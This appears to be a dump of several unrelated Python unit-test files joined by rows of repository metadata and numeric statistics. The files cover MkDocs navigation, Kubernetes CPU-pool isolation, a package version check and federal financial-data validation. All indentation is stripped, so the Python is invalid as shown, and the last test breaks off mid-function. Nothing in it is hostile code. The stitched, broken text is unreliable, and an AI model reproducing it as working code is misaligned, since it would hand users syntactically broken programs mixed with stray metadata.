def test_duplicate_navigation_item(self):
navigation = self.createAwesomeNavigation([
self.page('1'),
self.page('2a', '2.md'),
self.page('2b', '2.md'),
Meta(nav=[
MetaNavItem('2.md'),
MetaNavItem('1.md')
])
])
self.assertNavigationEqual(navigation.items, [
self.page('2b', '2.md'),
self.page('1')
])
def test_not_found(self):
with self.assertRaises(NavEntryNotFound):
self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('1.md'),
MetaNavItem('3.md')
])
])
def test_not_found_not_strict(self):
with self.assertWarns(NavEntryNotFound):
self.createAwesomeNavigation([
self.page('1'),
self.page('2'),
Meta(nav=[
MetaNavItem('1.md'),
MetaNavItem('3.md')
])
], strict=False)
| 29.91029
| 61
| 0.447159
| 992
| 11,336
| 5.051411
| 0.063508
| 0.191579
| 0.05927
| 0.077829
| 0.924566
| 0.888046
| 0.88645
| 0.88645
| 0.874277
| 0.857513
| 0
| 0.025116
| 0.392378
| 11,336
| 378
| 62
| 29.989418
| 0.702381
| 0
| 0
| 0.867647
| 0
| 0
| 0.065367
| 0
| 0
| 0
| 0
| 0
| 0.094118
| 1
| 0.055882
| false
| 0
| 0.008824
| 0
| 0.067647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3ac3def2bea175a12f11df987353c0275b9c305
| 11,093
|
py
|
Python
|
tests/unit/test_isolate.py
|
GitSoftwareNow/CPU-Manager-for-Kubernetes
|
46988af8a5c005abeb6f68162035b7be632f76c9
|
[
"Apache-2.0"
] | 1
|
2019-04-25T23:25:45.000Z
|
2019-04-25T23:25:45.000Z
|
tests/unit/test_isolate.py
|
GitSoftwareNow/CPU-Manager-for-Kubernetes
|
46988af8a5c005abeb6f68162035b7be632f76c9
|
[
"Apache-2.0"
] | 1
|
2021-02-24T01:11:52.000Z
|
2021-02-24T01:11:52.000Z
|
tests/unit/test_isolate.py
|
isabella232/CPU-Manager-for-Kubernetes
|
b92d994fedc734898f9852bb65fcd4cd2be55384
|
[
"Apache-2.0"
] | null | null | null |
from intel import isolate, config
from unittest.mock import patch, MagicMock
import pytest
import os
EXCL_ONE = [
{
"pool": "exclusive",
"socket": "0",
"cl": "0,11",
"tasks": ["123"]
}
]
SHAR_ONE = [
{
"pool": "shared",
"socket": "0",
"cl": "4,15,5,16",
"tasks": ["123"]
}
]
INF_ONE = [
{
"pool": "infra",
"socket": "0",
"cl": "6,17,7,18,8,19",
"tasks": ["123"]
}
]
EXNI_ONE = [
{
"pool": "exclusive-non-isolcpus",
"socket": "0",
"cl": "9,20",
"tasks": ["123"]
}
]
FAKE_CONFIG = {
"exclusive": {
"0": {
"0,11": [],
"1,12": [],
"2,13": []
},
"1": {
"3,14": []
}
},
"shared": {
"0": {
"4,15,5,16": []
},
"1": {}
},
"infra": {
"0": {
"6,17,7,18,8,19": []
},
"1": {}
},
"exclusive-non-isolcpus": {
"0": {
"9,20": [],
"10,21": []
},
"1": {}
}
}
def return_config(conf):
c = FAKE_CONFIG
for item in conf:
c[item["pool"]][item["socket"]][item["cl"]] = item["tasks"]
return config.build_config(c)
class MockConfig(config.Config):
def __init__(self, conf):
self.cm_name = "fake-name"
self.owner = "fake-owner"
self.c_data = conf
def lock(self):
return
def unlock(self):
return
class MockProcess():
def __init__(self):
self.pid = 9
self.affinity = []
def cpu_affinity(self, cpus=None):
if not cpus:
return self.get_cpu_affinity()
else:
self.set_cpu_affinity(cpus)
def get_cpu_affinity(self):
return self._cpu_affin
def set_cpu_affinity(self, new_affin):
self._cpu_affin = new_affin
class MockChild():
def __init__(self):
self.name = "child"
self.terminate = "term"
def wait(self):
return
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
@patch('intel.k8s.delete_config_map',
MagicMock(return_value=''))
@patch('intel.config.Config.lock', MagicMock(return_value=''))
@patch('intel.config.Config.unlock', MagicMock(return_value=''))
def test_isolate_exclusive1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process', MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [0, 11]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive2():
p = MockProcess()
c = MockConfig(return_config(EXCL_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [1, 12]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive3():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id="1")
assert p.cpu_affinity() == [3, 14]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [4, 15, 5, 16]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared2():
p = MockProcess()
c = MockConfig(return_config(SHAR_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [4, 15, 5, 16]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_infra1():
p = MockProcess()
c = MockConfig(return_config([]))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("infra", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [6, 17, 7, 18, 8, 19]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_infra2():
p = MockProcess()
c = MockConfig(return_config(INF_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("infra", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [6, 17, 7, 18, 8, 19]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_exclusive_non_isolcpus2():
p = MockProcess()
c = MockConfig(return_config(EXNI_ONE))
with patch('psutil.Process',
MagicMock(return_value=p)):
with patch('intel.config.Config', MagicMock(return_value=c)):
isolate.isolate("exclusive-non-isolcpus", False, "fake-cmd",
["fake-args"], socket_id=None)
assert p.cpu_affinity() == [10, 21]
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_pool_not_exist():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(KeyError) as err:
isolate.isolate("fake-pool", False, "fake-cmd",
["fake-args"], socket_id=None)
assert err is not None
assert err.value.args[0] == "Requested pool fake-pool does not exist"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch('os.getenv', MagicMock(return_value=0))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_n_cpus_lt_one():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(ValueError) as err:
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id=None)
assert err is not None
assert err.value.args[0] == "Requested numbers of cores "\
"must be positive integer"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch('os.getenv', MagicMock(return_value=5))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_not_enough_cpus():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(SystemError) as err:
isolate.isolate("exclusive", False, "fake-cmd",
["fake-args"], socket_id=None)
assert err is not None
assert err.value.args[0] == "Not enough free cpu lists "\
"in pool exclusive"
@patch('subprocess.Popen', MagicMock(return_value=MockChild()))
@patch('intel.proc.getpid', MagicMock(return_value=1234))
@patch('signal.signal', MagicMock(return_value=None))
@patch.dict(os.environ, {"HOSTNAME": "fake-pod"})
@patch('intel.k8s.get_node_from_pod',
MagicMock(return_value="fake-node"))
def test_isolate_shared_failure1():
c = MockConfig(return_config([]))
with patch('intel.config.Config', MagicMock(return_value=c)):
with pytest.raises(SystemError) as err:
isolate.isolate("shared", False, "fake-cmd",
["fake-args"], socket_id="1")
assert err is not None
assert err.value.args[0] == "No cpu lists in pool shared"
| 32.722714
| 77
| 0.611016
| 1,343
| 11,093
| 4.886821
| 0.106478
| 0.166844
| 0.222459
| 0.04693
| 0.807558
| 0.807558
| 0.783483
| 0.770684
| 0.770684
| 0.769465
| 0
| 0.023248
| 0.22059
| 11,093
| 338
| 78
| 32.819527
| 0.735832
| 0
| 0
| 0.586572
| 0
| 0
| 0.21464
| 0.042099
| 0
| 0
| 0
| 0
| 0.056537
| 1
| 0.077739
| false
| 0
| 0.014134
| 0.014134
| 0.123675
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3fedd54f35b58ab8701773f5d93dc85a0cd0515
| 244
|
py
|
Python
|
tests/test_version.py
|
rpanderson/workflow-sandbox
|
f03ea46945decb683cb95afa6f835a83884dc05e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_version.py
|
rpanderson/workflow-sandbox
|
f03ea46945decb683cb95afa6f835a83884dc05e
|
[
"BSD-3-Clause"
] | 17
|
2020-05-07T00:59:33.000Z
|
2021-12-12T03:55:14.000Z
|
tests/test_version.py
|
rpanderson/workflow-sandbox
|
f03ea46945decb683cb95afa6f835a83884dc05e
|
[
"BSD-3-Clause"
] | 2
|
2020-06-23T03:09:44.000Z
|
2020-06-23T05:50:31.000Z
|
from pkg_resources import get_distribution
import workflow_sandbox
def test_version():
"""Check version against `pkg_resources` from `setuptools`."""
assert workflow_sandbox.__version__ == get_distribution('workflow_sandbox').version
| 30.5
| 87
| 0.795082
| 28
| 244
| 6.5
| 0.535714
| 0.247253
| 0.241758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114754
| 244
| 7
| 88
| 34.857143
| 0.842593
| 0.229508
| 0
| 0
| 0
| 0
| 0.087912
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
581d733e97eb87fc055b25e43cad0b2b5625ac13
| 24,216
|
py
|
Python
|
tests/unit/dataactvalidator/test_c21_award_financial.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | 1
|
2019-06-22T21:53:16.000Z
|
2019-06-22T21:53:16.000Z
|
tests/unit/dataactvalidator/test_c21_award_financial.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
tests/unit/dataactvalidator/test_c21_award_financial.py
|
dael-victoria-reyes/data-act-broker-backend
|
f83c7cad29cac24d95f45a262710dc1564de7dc1
|
[
"CC0-1.0"
] | null | null | null |
from random import randint
from tests.unit.dataactcore.factories.staging import AwardFinancialFactory
from tests.unit.dataactcore.factories.staging import ObjectClassProgramActivityFactory
from tests.unit.dataactvalidator.utils import number_of_errors, query_columns
_FILE = 'c21_award_financial'
_TAS = 'c21_award_financial_tas'
af_dict = dict(
submission_id=randint(1000, 10000),
tas='some-tas',
program_activity_code='some-code',
ussgl480100_undelivered_or_fyb=randint(-10000, -1000),
ussgl480100_undelivered_or_cpe=randint(-10000, -1000),
ussgl483100_undelivered_or_cpe=randint(-10000, -1000),
ussgl488100_upward_adjustm_cpe=randint(-10000, -1000),
obligations_undelivered_or_fyb=randint(-10000, -1000),
obligations_undelivered_or_cpe=randint(-10000, -1000),
ussgl490100_delivered_orde_fyb=randint(-10000, -1000),
ussgl490100_delivered_orde_cpe=randint(-10000, -1000),
ussgl493100_delivered_orde_cpe=randint(-10000, -1000),
ussgl498100_upward_adjustm_cpe=randint(-10000, -1000),
obligations_delivered_orde_fyb=randint(-10000, -1000),
obligations_delivered_orde_cpe=randint(-10000, -1000),
ussgl480200_undelivered_or_fyb=randint(-10000, -1000),
ussgl480200_undelivered_or_cpe=randint(-10000, -1000),
ussgl483200_undelivered_or_cpe=randint(-10000, -1000),
ussgl488200_upward_adjustm_cpe=randint(-10000, -1000),
gross_outlays_undelivered_fyb=randint(-10000, -1000),
gross_outlays_undelivered_cpe=randint(-10000, -1000),
ussgl490200_delivered_orde_cpe=randint(-10000, -1000),
ussgl490800_authority_outl_fyb=randint(-10000, -1000),
ussgl490800_authority_outl_cpe=randint(-10000, -1000),
ussgl498200_upward_adjustm_cpe=randint(-10000, -1000),
gross_outlays_delivered_or_fyb=randint(-10000, -1000),
gross_outlays_delivered_or_cpe=randint(-10000, -1000),
gross_outlay_amount_by_awa_fyb=randint(-10000, -1000),
gross_outlay_amount_by_awa_cpe=randint(-10000, -1000),
obligations_incurred_byawa_cpe=randint(-10000, -1000),
ussgl487100_downward_adjus_cpe=randint(-10000, -1000),
ussgl497100_downward_adjus_cpe=randint(-10000, -1000),
ussgl487200_downward_adjus_cpe=randint(-10000, -1000),
ussgl497200_downward_adjus_cpe=randint(-10000, -1000),
deobligations_recov_by_awa_cpe=randint(-10000, -1000)
)
def test_column_headers(database):
expected_subset = {'row_number', 'tas', 'program_activity_code', 'ussgl480100_undelivered_or_fyb_sum_c',
'ussgl480100_undelivered_or_cpe_sum_c', 'ussgl483100_undelivered_or_cpe_sum_c',
'ussgl488100_upward_adjustm_cpe_sum_c', 'obligations_undelivered_or_fyb_sum_c',
'obligations_undelivered_or_cpe_sum_c', 'ussgl490100_delivered_orde_fyb_sum_c',
'ussgl490100_delivered_orde_cpe_sum_c', 'ussgl493100_delivered_orde_cpe_sum_c',
'ussgl498100_upward_adjustm_cpe_sum_c', 'obligations_delivered_orde_fyb_sum_c',
'obligations_delivered_orde_cpe_sum_c', 'ussgl480200_undelivered_or_fyb_sum_c',
'ussgl480200_undelivered_or_cpe_sum_c', 'ussgl483200_undelivered_or_cpe_sum_c',
'ussgl488200_upward_adjustm_cpe_sum_c', 'gross_outlays_undelivered_fyb_sum_c',
'gross_outlays_undelivered_cpe_sum_c', 'ussgl490200_delivered_orde_cpe_sum_c',
'ussgl490800_authority_outl_fyb_sum_c', 'ussgl490800_authority_outl_cpe_sum_c',
'ussgl498200_upward_adjustm_cpe_sum_c', 'gross_outlays_delivered_or_fyb_sum_c',
'gross_outlays_delivered_or_cpe_sum_c', 'gross_outlay_amount_by_awa_fyb_sum_c',
'gross_outlay_amount_by_awa_cpe_sum_c', 'obligations_incurred_byawa_cpe_sum_c',
'ussgl487100_downward_adjus_cpe_sum_c', 'ussgl497100_downward_adjus_cpe_sum_c',
'ussgl487200_downward_adjus_cpe_sum_c', 'ussgl497200_downward_adjus_cpe_sum_c',
'deobligations_recov_by_awa_cpe_sum_c', 'ussgl480100_undelivered_or_fyb_sum_b',
'ussgl480100_undelivered_or_cpe_sum_b', 'ussgl483100_undelivered_or_cpe_sum_b',
'ussgl488100_upward_adjustm_cpe_sum_b', 'obligations_undelivered_or_fyb_sum_b',
'obligations_undelivered_or_cpe_sum_b', 'ussgl490100_delivered_orde_fyb_sum_b',
'ussgl490100_delivered_orde_cpe_sum_b', 'ussgl493100_delivered_orde_cpe_sum_b',
'ussgl498100_upward_adjustm_cpe_sum_b', 'obligations_delivered_orde_fyb_sum_b',
'obligations_delivered_orde_cpe_sum_b', 'ussgl480200_undelivered_or_fyb_sum_b',
'ussgl480200_undelivered_or_cpe_sum_b', 'ussgl483200_undelivered_or_cpe_sum_b',
'ussgl488200_upward_adjustm_cpe_sum_b', 'gross_outlays_undelivered_fyb_sum_b',
'gross_outlays_undelivered_cpe_sum_b', 'ussgl490200_delivered_orde_cpe_sum_b',
'ussgl490800_authority_outl_fyb_sum_b', 'ussgl490800_authority_outl_cpe_sum_b',
'ussgl498200_upward_adjustm_cpe_sum_b', 'gross_outlays_delivered_or_fyb_sum_b',
'gross_outlays_delivered_or_cpe_sum_b', 'gross_outlay_amount_by_pro_fyb_sum_b',
'gross_outlay_amount_by_pro_cpe_sum_b', 'obligations_incurred_by_pr_cpe_sum_b',
'ussgl487100_downward_adjus_cpe_sum_b', 'ussgl497100_downward_adjus_cpe_sum_b',
'ussgl487200_downward_adjus_cpe_sum_b', 'ussgl497200_downward_adjus_cpe_sum_b',
'deobligations_recov_by_pro_cpe_sum_b'}
actual = set(query_columns(_FILE, database))
assert (actual & expected_subset) == expected_subset
def test_success(database):
""" Tests that the sum of financial elements in File C is less than or equal
to the corresponding element in File B for the same TAS and Program Activity Code combination"""
af1 = AwardFinancialFactory(**af_dict)
af2 = AwardFinancialFactory(**af_dict)
op1 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] * 2,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] * 2,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] * 2,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] * 2,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] * 2,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] * 2,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] * 2,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] * 2,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] * 2,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] * 2,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] * 2,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] * 2,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] * 2,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] * 2,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] * 2,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] * 2,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] * 2,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] * 2,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] * 2,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] * 2,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] * 2,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] * 2,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] * 2,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] * 2,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] * 2,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] * 2,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] * 2,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] * 2,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] * 2,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] * 2,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] * 2,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] * 2,
tas=af_dict['tas'],
program_activity_code=af_dict['program_activity_code'],
submission_id=af_dict['submission_id']
)
op2 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] * 2,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] * 2,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] * 2,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] * 2,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] * 2,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] * 2,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] * 2,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] * 2,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] * 2,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] * 2,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] * 2,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] * 2,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] * 2,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] * 2,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] * 2,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] * 2,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] * 2,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] * 2,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] * 2,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] * 2,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] * 2,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] * 2,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] * 2,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] * 2,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] * 2,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] * 2,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] * 2,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] * 2,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] * 2,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] * 2,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] * 2,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] * 2,
tas='some-other-tas',
program_activity_code=af_dict['program_activity_code'],
submission_id=af_dict['submission_id']
)
op3 = ObjectClassProgramActivityFactory(
ussgl480100_undelivered_or_fyb=af_dict['ussgl480100_undelivered_or_fyb'] * 2,
ussgl480100_undelivered_or_cpe=af_dict['ussgl480100_undelivered_or_cpe'] * 2,
ussgl483100_undelivered_or_cpe=af_dict['ussgl483100_undelivered_or_cpe'] * 2,
ussgl488100_upward_adjustm_cpe=af_dict['ussgl488100_upward_adjustm_cpe'] * 2,
obligations_undelivered_or_fyb=af_dict['obligations_undelivered_or_fyb'] * 2,
obligations_undelivered_or_cpe=af_dict['obligations_undelivered_or_cpe'] * 2,
ussgl490100_delivered_orde_fyb=af_dict['ussgl490100_delivered_orde_fyb'] * 2,
ussgl490100_delivered_orde_cpe=af_dict['ussgl490100_delivered_orde_cpe'] * 2,
ussgl493100_delivered_orde_cpe=af_dict['ussgl493100_delivered_orde_cpe'] * 2,
ussgl498100_upward_adjustm_cpe=af_dict['ussgl498100_upward_adjustm_cpe'] * 2,
obligations_delivered_orde_fyb=af_dict['obligations_delivered_orde_fyb'] * 2,
obligations_delivered_orde_cpe=af_dict['obligations_delivered_orde_cpe'] * 2,
ussgl480200_undelivered_or_fyb=af_dict['ussgl480200_undelivered_or_fyb'] * 2,
ussgl480200_undelivered_or_cpe=af_dict['ussgl480200_undelivered_or_cpe'] * 2,
ussgl483200_undelivered_or_cpe=af_dict['ussgl483200_undelivered_or_cpe'] * 2,
ussgl488200_upward_adjustm_cpe=af_dict['ussgl488200_upward_adjustm_cpe'] * 2,
gross_outlays_undelivered_fyb=af_dict['gross_outlays_undelivered_fyb'] * 2,
gross_outlays_undelivered_cpe=af_dict['gross_outlays_undelivered_cpe'] * 2,
ussgl490200_delivered_orde_cpe=af_dict['ussgl490200_delivered_orde_cpe'] * 2,
ussgl490800_authority_outl_fyb=af_dict['ussgl490800_authority_outl_fyb'] * 2,
ussgl490800_authority_outl_cpe=af_dict['ussgl490800_authority_outl_cpe'] * 2,
ussgl498200_upward_adjustm_cpe=af_dict['ussgl498200_upward_adjustm_cpe'] * 2,
gross_outlays_delivered_or_fyb=af_dict['gross_outlays_delivered_or_fyb'] * 2,
gross_outlays_delivered_or_cpe=af_dict['gross_outlays_delivered_or_cpe'] * 2,
gross_outlay_amount_by_pro_fyb=af_dict['gross_outlay_amount_by_awa_fyb'] * 2,
gross_outlay_amount_by_pro_cpe=af_dict['gross_outlay_amount_by_awa_cpe'] * 2,
obligations_incurred_by_pr_cpe=af_dict['obligations_incurred_byawa_cpe'] * 2,
ussgl487100_downward_adjus_cpe=af_dict['ussgl487100_downward_adjus_cpe'] * 2,
ussgl497100_downward_adjus_cpe=af_dict['ussgl497100_downward_adjus_cpe'] * 2,
ussgl487200_downward_adjus_cpe=af_dict['ussgl487200_downward_adjus_cpe'] * 2,
ussgl497200_downward_adjus_cpe=af_dict['ussgl497200_downward_adjus_cpe'] * 2,
deobligations_recov_by_pro_cpe=af_dict['deobligations_recov_by_awa_cpe'] * 2,
tas=af_dict['tas'],
program_activity_code='some-other-code',
submission_id=af_dict['submission_id']
)
errors = number_of_errors(_FILE, database, models=[af1, af2, op1, op2, op3])
assert errors == 0
def test_failure(database):
""" Tests that the sum of financial elements in File C is not less than or equal
to the corresponding element in File B for the same TAS and Program Activity Code combination"""
